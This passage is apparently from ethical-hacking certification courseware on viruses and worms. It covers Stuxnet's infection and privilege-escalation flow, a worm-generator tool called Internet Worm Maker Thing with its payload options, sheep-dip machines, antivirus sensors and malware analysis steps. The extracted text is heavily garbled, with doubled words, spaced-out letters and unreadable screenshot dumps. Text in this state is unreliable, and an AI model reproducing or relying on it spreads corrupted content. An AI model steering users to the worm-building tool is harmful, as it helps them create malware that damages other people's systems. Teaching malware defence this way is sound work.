M rx rx d s .s y s
M r x c ls .s y s
------------- * ------------Version OK
Decrypt & load self from disk. Call export 6 - get version
Compare running version number and version on disk
h t t p : / / w w w . s y ma n t e c . c o m
Copyright © byEC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
W o r m A n a l y s is i s : S t u x n et e t (C ( C o n t ’d ’d ) Source: h t t p : / / w w w . s y r n a n t e c . c o m
I n f e c t i o n R o u t i n e F l ow Stuxnet checks if it has administrator rights on the computer. Stuxnet wants to run with the highest privilege possible so that it has permission to take whatever actions it likes on t h e c o m p u t e r . I f i t d o e s n o t h a v e A d m i n i s t r a t o r r i g ht ht s , i t e x e c u t e s o n e o f t h e t w o z e r o - d a y e s c a l a t io io n o f p r i v i le le g e a t t a c k s d e s c r i b e d i n t h e f o l l o w i n g d i a g r a m . I f t h e p r o c e s s a l r e a d y h a s t h e r i g h t s i t r e q u i r e s , i t p r o c e e d s t o p r e p a r e t o c a l l e x p o r t 1 6 in in t h e main .dll file. It calls export 16 by using the injection te chniques described in the Injection Technique section. W h e n t h e p r o c e s s do d o e s n o t h a v e a d m i n i s t r a t o r r i g h t s on on t h e s y s t e m , i t t r i e s t o a t t a i n t h e s e privileges by using one of two zero-day escalation of privilege attacks. The attack vector used is b as a s e d o n t h e o p e r a t i n g s y s t e m o f th t h e c o m p r o m i s e d c o m p u t e r . I f t h e o p e r a t i n g s y s t em e m is Windows Vista, Windows 7, or Windows Server 2008 R2, the currently undisclosed Task S c h e d u l e r E s c a la la t io io n o f P r iv iv i le le g e v u l n e r a b i l i t y i s e x p l o i t e d . I f t h e o p e r a t i n g s y s t e m is W i n d o w s XP, t h e c u r r e n t l y u n d i s c lo l o s e d w i n 3 2 k . s y s e s c a l a t i o n o f p r i v i l e g e v u l n e r a b i l i t y is e x p l o i te te d .
Module 07 Page 1074
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
I f e x p l o i t e d , b o t h o f t h e s e v u l n e r a b i l i t i e s r e s u l t i n t h e m a i n . d llll f ilil e r u n n i n g a s a n e w p r o c e s s , e i t h e r w i t h i n t h e c s rs rs s .e .e x e p r oc oc e s s i n t h e c as as e o f th t h e w i n 3 2 k . s y s v u l n e r a b i l i t y o r as as a n e w t a s k w i t h a d m i n i s t r a t o r r i g h t s i n t h e c a se se o f t h e T a sk sk S c h e d u l e r v u l n e r a b i l it it y . T h e c o d e t o e x p l o i t t h e w i n 3 2 k . s y s v u l n e r a b i l i t y is is s t o r e d i n r e s o u r c e 2 5 0 . D e t a ilil s o f t h e Win32k.sys Vulnerability and the Task Scheduler vulnerability currently are not released as p a t c h e s a r e n o t y e t a v a i l a bl bl e . A f t e r e x p o r t 1 5 c o m p l e t e s t h e r e q u i r e d c h e c k s, s , e x p o r t 1 6 is is c a lll l e d. d. E x p o r t 1 6 is is t h e m a i n i n s t a l l e r f o r S t u x n e t . I t ch ch e c ks ks t h e d a t e a n d t h e v e r s i o n n u m b e r o f t h e c o m p r o m i s e d c o m p u t e r ; d e c r y p t s , c r e a t e s , an a n d i n s t al a l ls ls t h e r o o t k i t fi fi l es es a n d r e g i s t r y k ey ey s ; in i n j e c ts ts itself into the services.exe process to infect removable drives; injects itself into the Step7 process to infect all Step 7 projects; sets up the global mutexes that are used to communicate b e t w e e n d i f f e r e n t c o m p o n e n t s ; a n d c o n n e c t s t o t h e R PC PC s e r v er er . E x p o r t 1 6 f i r s t c h ec ec k s t h a t t h e c o n f i g u r a t i o n d a t a i s v a l id id , a f t e r t h a t i t c h e c k s t h e v a l u e " N T V D M TRACE" in the following registry key: H K E Y _ L O C A L _ M A C H I N E \ S O F T W A R E \ M i c r o s o f t\ t \ W i n d o w s \ C u r re r e n t V e r s io io n \ M S - D O S E m u l at a t io io n ( C o n t ’d ’d ) Error
>
Check ck CFG
Equal < r~
Reg key key NTVDM Trace=19790529
Inject Inject in in Step 7 & call export export 32
Inject in service, call export 32 A. .........
Infects Step 7 projects
Create global mutexes
Past Past deadl ine
<-----
Date<06/24/2012 ^
: Hides : malicious : files
D a te te OK
Check OS XP or less
Create rootkit service service reg keys
■
Inject Inject in in Step 7 & call export 32
Vista or higher
V Set DACL
y Set SACL
V Set file file times times
Exit
...... .
V Create global mutex
---------- A
r>
V
Oem7a.pnf
Create.pnf &
Decrypt resou rce 201 & 242 & write to disk
Rootkit file fil es
.cfg files j. File OK
Decrypt & load self
Date<06/24/2012
from disk. Call export 6 - get version
Compare running version numberand version on disk
FIGURE 7.23: 7.23: Infection routine Flow
Module 07 Page 1075
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
-
Worm Worm Maker: Intern I nternet et Worm Worm Maker Mak er Thing Thing Interne t Worm Maker Thing
C EH
Version 4.00: Public Edition
IWTFRNFT WORM MAKFR THING V4
Poyloods: CA ctitivae t PayoladsOnDae t f Clenjeltvosse
f~C tscbcSystcffll!Resrare
00 MM VY
I Drafcl:l:W tafcrnsSearity r Charge2 0 Text OR Dsabfe1 0 Seanry ry te C Ra ndom lyActitivate te»a>oadsII-- UTsalto'WSrprBowic I- LoopSound ChanceofactitivaTrop3y(03ds: V Dsobcf M5coS oScanty ty r rtdeDedctop 1IN| CHANCE r DtditRuiCannd DtditRuiCannd r Dsabte Sh_:d:vwn Dtesm aM 1- R 1“ HdrA I Drives WInd uSe[[C C]Nocte oveeMalware 3 0 I” DssbteL0 “ r Dsabte Task Manager 3 e a f c lewctinon dows 1 OutputPath: I- DkW; WnfcMIWeb He FVotccton P Osobfc Keybord r * Search Corcard n Co rrup t An ti v irus r 5®r©uxB-nort r Com pleToEXESupport r BsabteMDuse r—ChangeComputer 1 “ CptrWa C ptrWaw w P Me33ageB0x URL: ScreadlrgOpitons Tifle: Startp j: M.te50e»*rt r C hangeChveIc Icon f ~ ChangFETilrBar' F GlobalR«gtbyStartup n * *I* CU.EXZ.K .KO: Dd»*: Text r LocoiRccofrvStart-p Patv |C:\>Vnd0w:YJ01 |1 rW ntogonShel M ock Icon: A ddToConte textM enu“1 I -----------------r StartA#Servce f~ChangeW nMeAa*t*toyerT rT»t r Otletr e tro fflkler fflkler r C h a n ? C o d * T tut t a b r rngk! 'itjrt14> tartup r < r
r *«n(hS hStartup I” ItalanStortjp
r DeaUlcRcscdt
f On«!:lr P»1iar>»1.«•«•» r Cha w Reo Owner Owner:
I---------------------
Twit(Ma*001flf»)i
f“ OoenCdOrtves LockWorkt lattn P Do* Do* tood file M3r«’ |
URL:
P ChanceWatopcr fe«10rlIU:
r ChangeRegOrgsnsabon
r CRIMor*•*
OfQansator!:
r Owncer Owncer*< *<
I----------r !• rm _?J yboardDIko l~ Ke PAddToFavorites
I- BlueScremOf n te fco tnOpBore: r InfectBatFe is I” InfectAsPeis I- WectVoc Rfcs Exrtas: r Hd i eW rusfiles
If Y ouIkedT dThaProgramPiew te /isl Mtp://x
If Y ouKronAi^lHrq AboutV05
PtcHTdn i rict-p l5 uP« w t1Tth i A Pl l. yn yn (S »
Pu r : I Ry
R *W). *W) . n.
p
PExecue t DaW aafted
Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
W o rm M a k e r: I n te rn e t W o rm M a k e r T h in g Intern et W orm
M a k e r T h i n g is is a t o o l s p e c i f i c a l ly ly d e s ig ig n e d f o r g e n e r a t i n g a w o r m .
T h e se se g e n e r a t e d I n t e r n e t w o r m s t r y t o s p r e ad a d o v e r n e t w o r k s t h a t a re re b a s ic i c a l ly ly p r e s e t i n v a s i o n p r o x y a t t a c k s t h a t t a r g e t t h e h o s t t e c h n i c a l ly ly , p o i s o n i t , a n d m a k e a b a s e a n d p l a n s t o l a u n c h
the attack in future . The wo rm s wo rk indep ende ntly. An Inte rnet wo rm send dss c op o p i e s o f i t s e l f v ia ia v u l n e r a b l e c o m p u t e r s o n t h e I n t e rn rn e t .
Module 07 Page 1076
Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
Exam Exam 312-50 Certified Ethical Hacker
Internet Worm Maker Thing
Vernon
4.00:• Public Edition
INTERNET WORMM ORMMAKFRTHING FR THINGV4 V4
r^
dw
'
BO m
1— 1— r CfcM fcMWf -nrdiii iS w ih f
- Owng Owng N00» T««t T««t
Norton Saa**y Om M» Norton
ng*•
jw + tM ** 1r tan Scr** > 0d r Q
O In U > H N M a
Oueut*a»:
r* * YISoaJ r la pS«Lrt
r Whctt Whcttor* or*••
r
EMUM
r 1acj1iU9u .l 1 r
* H gg vM H
r
M r l M t t ra ra a
r
K* kwlx
r DamaFte r
M>a a.*-
r
CualooiCadt o oiCadt
r ChangeOft* eOft*Icon Dl l E1E. E1E. ICO. ICO.
to *»
(i r M d H C a r an an r lM lM n
r
OwttCMTDi
fou L*cd Tho Tho P f Ob
V t |f |f » Q At AtXfcif A AS S
* a y t t » t Haunq A PVjgr PVjgr p —
Span* Stor Stork• k•
T MMnSUrtk• MMnSUrtk•
C0n*« AnMnj*
r m ^ u l d w i ).
r fimwiUart• r
r i« * i»nr
p C hr hr 9 1 C«MPwl1 >
T ( r * * S to to rk rk •
r Nndtn Nndtnvks vks
n ot ot M i n e
' I r
QBM Dagn! S
r S r * K t r t « r t o
C C u k iU r t
r o ma ma et et F rf rf i l
r Cw^T«e*s Cw^T«e*s>«DB >«DB1 1
r
r **KtlMN **KtlMNn n
I----------- -------
F
A*vMadau<(ue
r RxSOMnorou•!
r »•*<<>Jt Jtt.
r
_
r
Urrto«*D«ea
r
Add Add To F*«nte»
tenridWim
CRiNarar
r OtrngtTmm
FIGURE 7.24: Internet Worm Maker Thing
Module 07 Page 1077
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
Exam Exam 312-50 Certified Ethical Hacker
M o d u le F lo w
C EH EH
Virus and Worms Concepts
Types of Viruses
Computer Worms
Penetration Testing
Counter• measures
M o d u l e F lo lo w —
M a l w a r e a n a ly s is is d e f i n e d as t h e a c t i o n o f t a k i n g m a l w a r e s e p a r a t e l y a p a r t f o r
s t u d y i n g i t. t. I t is is u su su a l ly l y p e r f o r m e d f o r v a r i o u s r e a s o ns n s s u c h as as f o r f i n d i n g t h e v u l n e r a b i l i t i e s t h a t a r e e x p l o it i t e d f o r s p r e a d i n g t h e m a l w a r e , t h e i n f o r m a t i o n t h a t w a s s t o le le n , a n d p r e v e n t i o n t e c h n i q u e s t o b e t a k e n a g a in i n s t it it f r o m e n t e r i n g t h e s y s t e m o r n e t w o r k i n f u t u r e .
,4 ,
.' V
V ir i r u s a nd nd W o r m s C o n c e p t
^ •
Ma lware An na a ly l y s is is
Countermeasures
Types o f Viruses
•4
— v —
s
C o m p u te r W o rm s
^
P e n e tr t r at a t io i o n T es es t i ng ng
D e t a i l e d i n f o r m a t i o n a b o u t t h e m a l w a r e a n a l y si s i s p r o c e d u r e is e x p l a i n e d i n t h e n e x t f e w s l i de de s. s.
Module 07 Page 1078
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
W h a t is Sheep Sheep Dip Com C omput put er? er ?
C EH
(crtifwd 1 tthKjl IlMkM
Sheep heep dipping dippi ng refers to the the analysis analysis of suspect suspect files, fi les, incoming message ssages, s, etc. for f or malware A she sheep dip dip com compute puterr is insta installe lled d with with port port mon monitor itors, s, file mon monitor itors, s, netwo network rk mon monitors itors and antivirus software and connects to a network only under strictly controlled conditions
Run user, group group permission permission and process monitors
Run device driver and file monitors
Run port and network monitors
Run registr registry y and kernel monitors
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
W h a t I s a S h e e p D ip ip C o m p u t e r ? —
S h e e p d i p p i n g r e f e r s t o t h e a n a ly s i s o f s u s p e c t f il e s , i n c o m i n g m e s s a g e s , e t c . f o r
malware. T h is is " s h e e p d i p p e d " c o m p u t e r i s i s ol o l a te te d f r o m o t h e r c o m p u t e r s o n t h e n e t w o r k t o b l o c k a ny ny v i r us us e s f r o m
e n t e r i n g t h e s y s t e m . B e f o r e t h i s p r o c e d u r e i s c a r r ie ie d o u t , a n y d o w n l o a d e d
p r o g r a m s a r e s av av e d o n e x t e r n a l m e d i a s u c h as as C D - R O M s o r f l o p p y d i s k e t t e s . A sheep dip computer is installed with port monitors, files monitors, network monitors, and a n t iv i v i r u s s o f t w a r e a n d c o n n e c ts t s t o a n e t w o r k o n l y u n d e r s t r i c t ly ly c o n t r o l l e d c o n d i t i o n s . A s h ee ee p d i p c o m p u t e r : 0
R un un s p o r t a n d n e t w o r k m o n i t o r s
0
R un un s u s e err , g r o u p p e r m i s s i o n , a n d pr p r o c e ss ss m o n i t o r s
0
R un un s d e v i c e d r i v e r a n d f i l e m o n i t o r s
0
R un un s r e g i s t r y a n d k e r n e l m o n i t o r s
Module 07 Page 1079
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Anti-Virus Anti-Virus Se Senso nsors rs S yste ys tem ms B
CEH
Anti-virus Anti-virus system is a collection of com puter software that detects and analyzes malicious code thre ats such as viruses, worms, and Trojans. They are used a long with sheep dip computers
Network
a *
i f
Anti-Virus Anti-Virus Sys tem
.....
System 1
System 2
Anti-Virus
Anti-Spyware
Anti-Trojan
Anti-Spamware
Allowed Traffic
a
Reflected **► **► Traff Traffic ic
Internet
System 3
EE
Anti-Phishing
Email-Scanner
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
A n t iv iv i r u s S e n s o r S y s t e m s An antivirus system is a collection of computer software that detects and analyzes various malicious code threats such as viruses, worms, and Trojans. They are used along with sheep dip computers.
Network
B System
.....
Anti-Virus System
H
1
System
2
Anti Virus
Anti Spyware
•
Reflected Traffic
1 Allowed Traffic
U
M
Anti Trojan
Allowed Traffic
Anti Spamware
System 3
** Reflected **> Traffic
Internet
m Anti-Phishing
Email-Scanner
FIGU FIGURE RE 7.25: 7.25: W orking of A nt ntivirus ivirus S ensor Systems
Module 07 Page 1080
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
An antivirus system includes antivirus, anti-spyware, anti-Trojan, anti-spamware, anti-Phishing, an email scanner, and so on. Usually, it is placed in between the network and Internet. It allows o n l y g e n u i n e t r a f f i c t o f l o w t h r o u g h t h e n e t w o r k a n d b l o ck c k s m a l i c i o u s t r a f f i c f r o m e n t e r in in g . As As a result, it ensures network security.
Module 07 Page 1081
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
M alware Ana lysis lysis Procedure Procedure:: Prepa ring Testbed Testbed Isolate the system systemfrom from the Disable isable the 'shared shared network by ensuring ensuring that the folders', folders', and and t h e'gue e' guest st NIC card is in "host only" mode isol isolati ation' on'
C EH
Copy the th e malware malware over to the th e guest OS
*
fc c a
0 Install guest OS into the Virtual PC/ VM Ware Wa re
Install Install V MW are or Virtual PC on the system Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
M a l w a r e A n a l y s is is P r o c e d u r e : P r e p a r in g T e s tb e d M a l w a r e a n a l y si s i s p ro ro v i d e s i n - d e p t h u n d e r s t a n d i n g o f e a c h in in d i v i d u a l s a m p l e an an d identifies emerging technical trends from the large collections of malware samples. The s a m p le l e s o f m a l w a r e a re r e m o s t l y c o m p a t i b l e w i t h th th e W i n d o w s b i n a r y e x e c u t a b l e . M a l w a r e analysis is conducted with a variety of goals. The following is the procedure for malware analysis preparing Testbed: 0
I n st s t a llll V M W a r e o r V i r t u a l PC PC o n t h e s y s t e m
0
I n st s t a llll g u e s t OS i n t o t h e V i r t u a l P C / V M W a r e
0
I s o la la t e t h e s y s t e m f r o m t h e n e t w o r k b y e n s u r in in g t h a t t h e N IC IC c a r d is is i n " h o s t o n l y " mode
0
D i sa s a b le le t h e s h a re re d f o l d e r s a n d t h e g u e s t i s o l a t i o n
0
C o p y t h e m a l w a r e o v e r t o t h e g u e s t OS
Module 07 Page 1082
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Malware A nalysis naly sis Procedure 1. Perfor m static analysis whe n the malw are is inactive 2. Collect inform ation about:
0 String tring values values found in the binary with the t he help help of string string extr extracting acting tools such as BinText e The packaging and compressing technique technique used with wit h the the help of compressi compression on and decompression decompression tool t ools s such as UPX
UP X
BinText
1- 1° Swxeh |r ,1*
| Htto |
P|?lO«can [C\U1tnVAdnwnfc«lc1>D«1klap\1 klap\1«
fbwi
iMfpw
A COOOOOOCOMO ' 11 A ill 1.V; A a ccoocaxcxc A CCOOCOOCG278 A COOOOOOCG29F a
;
; ;;
OCCD3C000040 000030000110 OCC03C000228 OCC03000Q250 OCC03000G278 OOG03G00029f OCCC3C0013C
A :000000C0928 0C0030001528
/. m nvin: /.
hi if:
A XOXOOCCE9C A 3COXOOCCCC3 :OOOOOOCCEFO A :O a :coocaxtfiB
OC003000IA44 OC003000IA70 OCC03C001A3C 0CCC30001AC8 0C0030001AFO OC003C1001B18
TiroUf can 0109 me• T«41ia> 37310t*0 1 1364GK|
10 1TfH~
Administrator: C:\Windows\system32\cmd.exe D:sCEH T0013\CEH v 8 Module 07 Ulruses and WornsNConpression l\UPXNupx306«#supx306t#>upx.exe Ultimate Packer fur eXecutables Cop yr i if 111. 1996 2011 IPX 3.R*w Markus Oberliiinwr. Oberliiinwr. Lasz lo Molnar 0. John Rr I Usage: upx I I 2 3 4 56 56 7 * 9 d It It M ilil . 1 I - q u f k ] 1 -0 f i l e ! P i l e . .
dau Qitbc 0MZu3 lsf“roc«M01F©a1u1ePeiCrt KEMIE132
-I d -t -h
e impr ess fas ter decompress t*s t com compr pressed essed f 11• giv • nor• help
compr ass butter lis t r onppRssRd onppRssRd f i l e disp lay u r n ion imnb imnb• • d i s p la la y t o f t w M l ie ie •
-co c onpr npre3a e3a ~f
G«nor j|_RcpoMM FIh ToOoMo
FtoToKoop
lype *up* *up* --help' for nore deta iled help.
LownoFlw lw
R*pcrtnaFlw
JPX con es w ith ABSOLUTEL Y NO WARRANTY; fo r
inm
h t t p : / / w w w . m c a f e e .c .c o m
sit
h t t p : /' /' / u p x . 3 f .
h t t p : / / u p x . s o u r c e f o r g e .n .n e t
Copyright © by EG-Goilicil. All Rights Reserved. Reproduction is Strictly Prohibited
M a l w a r e A n a l y s is is P r o c e d u r e S t e p 1 : P e r f o r m s t a t ic ic a n a ly ly s i s w h e n t h e m a l w a r e is in in a c t i v e Step 2: Collect information about: Q
S t r in i n g v a l u e s f o u n d i n t h e b i n a r y w i t h t h e h e l p o f s t ri ri n g e x t r a c t i n g t o o l s s u c h as B in in T e x t
Q
T h e p ac a c k a g i ng n g a n d c o m p r e s s i n g te te c h n i q u e
use ed d with the help of comp ression and
decompression tools such as UPX
BinText Source: h t t p : / / w w w . m c a f e e . c o m B i n T e x t c a n e x t r a c t t e x t f r o m a n y k i n d o f fifi l e a n d i n c l u d e s t h e a b i l i t y t o f i n d p l a in in A S CI CI I t e x t , Unicode (double byte ANSI) text, and resource strings, providing useful information for each i t e m in t h e o p t i o n a l " a d v a n c e d " v i e w m o d e .
Module 07 Page 1083
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
_
BinText 3.0.3 Search | Filter | Help |
File(0scan |C:MJsers’Adm sers’Admntst ntstrat ratorNDe orNDesktopVseti sktopVsetip p exe I? Advancedview view Filepos 00000000004D 000000000110 000000000228 A 000000000250 A 000000000278 A 00000000029F A 0000000006BE A 00000000090C A 000000000928 OOOOOOOOE44 A O A 000000000E70 OOOOOOOOE9C A O A O OOOOOOOOEC8 A 000000000EF0 A 000000000F18 A A A
a nnnnnnnnnF44
< [
£0
Browse
Timetaken: aken: 0.109secs Text size: 37340bytes(36.46K) Mempos I© 00003000004D 0 000030000110 0 000030000228 0 000030000250 0 000030000278 0 00003000029F 0 0000300012BE 0 00003000150C 0 000030001528 0 000 0003 0300 0001 01A44 44 0 000030001A70 0 000 0003 0300 0001 01A9 A9C 0 000030001AC8 0 000030001AF0 0 000030001818 0 nnnrtwn1R44 n
f Text !This !This programcannot beruni runinDOSmode RicheWl text data rs»c 0 re(oc 0MZu3 IsProcessocFeaturePresent KERNEL32 General.AppNam eneral.AppName GenetalRe alReport portee FtesToDelete FiesToKeep FiesToKeep LoggngFlags RepcntngFlags epcntngFlags
A
u
V
llinmw
III
Ready
.
AN: 1840
UN 373
RS: 0
h
j
find | Save |
FIGURE 7.26: 7.26: Bintext Screenshot
U PX Source: h t t p : / / u p x . s o u r c e f o r g e . n e t U PX PX a c h i ev e v e s an an e x c e l l e n t c o m p r e s s i o n r a t i o a n d o f f e r s v e r y f a s t d e c o m p r e s s i o n . I t t y p i c a l l y c o m p r e s se s e s b e t t e r t h a n W i n Z i p / z ip ip / g z i p . 3S
Administrator: C:\Windows\system32\cm C:\Windows\system32\cmd.exe d.exe
D : \ C E H - T o o l s \ C E H v 8 M o d u l e 0 7 U i r u s e s a n d Wo Wo r ms ms \C \C o m p r e s s i o n a n d D e c o m p r es es s l\UPX\upx308w\upx308w>upx.exe U l t i m a t e P a ck ck et et * f o r e X e c u t a b l e s C o p y r i g h t 19 19 9 6 - 2 0 1 1 JPX 3 . 0 8 w M a rk rk u s O b e r h u m e r , L a s z l o M o l n a r & J o h n R e i s e r D ec ec 1 2 t h U s ag ag e : u p x
[ 1 2 3 4 5 6 7 8 9 d l t h UL ]
l -q v f k ]
1 -0
Commands: -1 c o m pr p r es es s f a s t e r -d decompress -t t e s t c om o m p re r e ss s s ed ed f i l e -h g i v e m or or e h e l p Options: -q be q u iet - 0 F IL IL E w r i t e o u t p u t t o ' F IL IL E ' -f f o r c e c o m p re r e ss s s io io n o f s u s p i c i o u s -k k e ep ep b ac ac k u p f i l e s F il e .. e x e c u t a b l e s t o < de d e >c >c o m pr pr es es s ry yp pe
'u 'u p x
— help'
J PX PX c o m es es w i t h
fo r
m or or e d e t a i l e d
file ]
fil e ..
-9 1 -U -L
c o mp m p r es es s b e t t e r l i s t c o mp m p re r e s s ed ed dis play version dis play software
-w
be verbose
file s
h elp.
A BS BSO LU LU TE TEL Y NO WA RR RRA NT NTY; f o r d e t a i l s
D:\CEH-Too ls\CEHv 8 Module 07 Uir us es l\UPX\upx308w\upx308w>
fi le n um u m be ber l ic ic e n s e
and
v is it
http://upx.sf.ne
Wo Wo r ms ms \C \C o m p r e s s i o n
a n d D e c o m p r es es s
FIGU FIGURE RE 7.27: UP UPX X W orking in C Com om man d P rom pt
Module 07 Page 1084
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Malware Analysis An alysis Procedure
CEH
Urt1fw4 ilhiul lUtbM
( C o n t ’d ’d )
Run the virus and moni tor the t he process process actions and system information with the help help of proce process ss monitoring monitori ng tools such as as Process Process Monito Moni torr and Process Process Explorer
3. Set up networ netw ork k connection and check that it is not giving any errors
r > t no
a
L il J
Process Monitor - Sysinternals: www.sysinternals.com File
Edit
Event
Filter
Tools
Options
U I Timeo e of Day f Day Process Name
Process Monitor
Help
] PID PID Operatio ration n 2384 CreateFieMapp 2384 2384 ^ CloseWe CreateFie ReadFie ReadFile ReadFie ,TCPReceive ,TCP Receive ,TCPSen ,TCP Send ReadFie ReadFie ReadFie ReadFie
Showing 89,723 of 186,768 events (43°: .1
Path Resut C \Wndows \System3 2'wnage res <* SUCCESS SUCCESS C \Windows\Systen132Nw1ageres \Windows\Systen132Nw1ageres dl SUCCESS SUCCESS C \Lbers \Admos trator\ ^pp Data\L ocal\... SUCCES UCCESS C \Window«\Mcro*oft NETXFramework... SUCCESS C XWindowsXMcrosoft NETXFramework... SUCCESS SUCCESS C\Window3\fAcT0soft.NETXFramework... SUCCESS WIN-MSSELCK4K41 1056 •>WIN-MSS... SUCCESS WIN-MSSELCK4K41:1055 •> WIN-MSS. SUCCESS C\Windows\Hcro C\Windows \Hcrosoft. soft. NETXFramevvork.. SUCCESS CXWindowsXAAcrosoft CXWindowsXAAcrosoft NETXFramework ..SUCCESS C XWindowsXMcrosoft NETXFramework... SUCCESS SUCCESS CXWindowsXfAcrosoft.NETXFramewoik... SUCCESS
Detail
SyncType SyncTy Deswed Access: S Offset: 7.623.168. Offset: 7.557.632. Offset: 7.574.016... Length 1. seqnum Length 1. starti startime Offset: 9.322.496. Offset: 9.547.776. Offset: 9.535.483. Offset: 7.803.392.
Backed by virtual memory
http://technet.microsoft.com Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited
M a l w a r e A n a l y s is i s P r o c e d u r e ( C o n t ’d ’d ) S t e p 3: 3: S et et u p n e t w o r k c o n n e c t i o n a n d c h e c k t h a t i t i s n o t g i v i n g a n y e r r o r s S t e p 4 : Ru R u n t h e v i r u s an an d m o n i t o r t h e p r o c e s s a c t i o n s a n d s y s t e m i n f o r m a t i o n w i t h t h e h e l p o f p r o c es e s s m o n i t o r i n g t o o l s s u ch ch a s P r oc oc e s s M o n i t o r a n d P r oc oc e s s E x p l o r e r
m . l^_
Process M onitor onitor Source: h t t p : / / t e c h n e t . m i c r o s o f t . c o m
P rro o ce c e ss ss M o n i t o r i s a n a d va v a n c e d m o n i t o r i n g t o o l f o r W i n d o w s t h a t s h o w s r e a l - t i m e f ili l e s y s te te m , registry, and process/thread activity.
Module 07 Page 1085
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Process Monitor - Sysinternals: www.sysinternals.com
File ile Edit Event Filter Fil ter Tools Options Options Help Time of Day Process Proce ss Name 12:13:46.620... 12:13:46.620... Explorer EX E 12:13:46.620 3:46.620... ... ^ ExplorerEX Explo rerEXE E 12:13:46.6 3:46.621. 21... ^E xp lore lo rer.E r.E XE 12:13:46.676 3:46.676... ... Bm m c.exe c.e xe 12:13:46.677 3:46.677... ... j a mmc.exe .exe 12:13:46 12:13:46.679... .679... Sm m c.e xe 12:13:46 3:46 685 .ttfir .tt firef efox ox .exe .e xe 12:13:46 3:46 685. 685. (Jfirefo (Jfir efox.e x.exe xe276 2760 12:13:46.687... jqimmc.exe4100 jqimmc.exe4100 12:13:46.694 3:46.694... ... ■Btmmcexe mcexe 12:13:46.695... 12:13:46.695... jgjmmc.exe jgjmm c.exe 12:13:46.696 3:46.696... ... ^m m c.exe c.e xe n
n
1 r r i v
__ _
i in in n
T3 n
PID Operation 2384 2k Create C reate FileMapp. 2384 ;rk CloseFile 2384 ; A CreateFile 4100 9 k Read File 4100 2 k Read File File 4100 2 k Read File 2760 2760 s*VTCP Receive Rec eive TCP Send Read File 4100 y k Read File 4100 2 k Read File 4100 irk Read File
iri
Showing 89,723 of 186,768 events (48%)
Path Result Detail C:\Windows\System32\imageres.dllSUC CES S SyncType: SyncTy.. C:\Windows\System32\imageres.dllSUC C:\W1ndows\S 1ndows\System ystem32\imageres.dl ageres.dlll SUCC SU CCES ESS S C:\Users\Administr C:\Users\Administrator\App ator\AppData\Local Data\Local\...SU \...SUCC CC ESS ES S Desired Desired Access: Access : S. .. C:\W1ndow s.Micro s.Microsoft soft NET.Framework ...SU ... SU CC ES S Offset: Offset:7,623,168,.. 7,623,168,.. C:\Windows\MicrosoftNET\Fram C:\Windows\ MicrosoftNET\Fram ework.SUCCESS ework.SUCC ESS Offset Offset::7,557,632,... C:\Windows\Microsoft.NET\Framework... C:\Windows\Microsoft.NET\Framework... SU CC ESS ES S Offset: Offset:7,574,016,.. 7,574,016,.. WIN-MSS WIN -MSSELCK4 ELCK4K41:1 K41:1056056->WIN >WIN-MS -MSS...SU S...SUCCESS CCESS Length: Length: 1. seqnum: seqnum:.. WIN-MSSEL WIN-M SSELCK4K4 CK4K41:105 1:1055 >WIN-MS >WIN- MS S...SUCCE S...SU CCE SS Length Length:: 1. startime rtime:.. :.. C:\Windows\Microsoft. C:\Windows\Micr osoft. NET•.Framework... ework... SUC CESS CE SS Offset: Offset:9,322,496,.. 9,322,496,.. C:\Windows\Microsoft.NET\Framework... C:\Windows\Microsoft.NET\Framework... SUCC SU CC ESS ES S Offset: Offset:9,547.776,... 9,547.776,... C:\Windows\Microsoft.NET\Framework... C:\Windows\Microsoft.NET\Framework... SUCC SU CC ESS ES S Offset: Offset:9,535.488... 9,535.488... C:\Windows\Microsoft.NET\Framework... C:\Windows\Microsoft.NET\Framework... SUCC SU CC 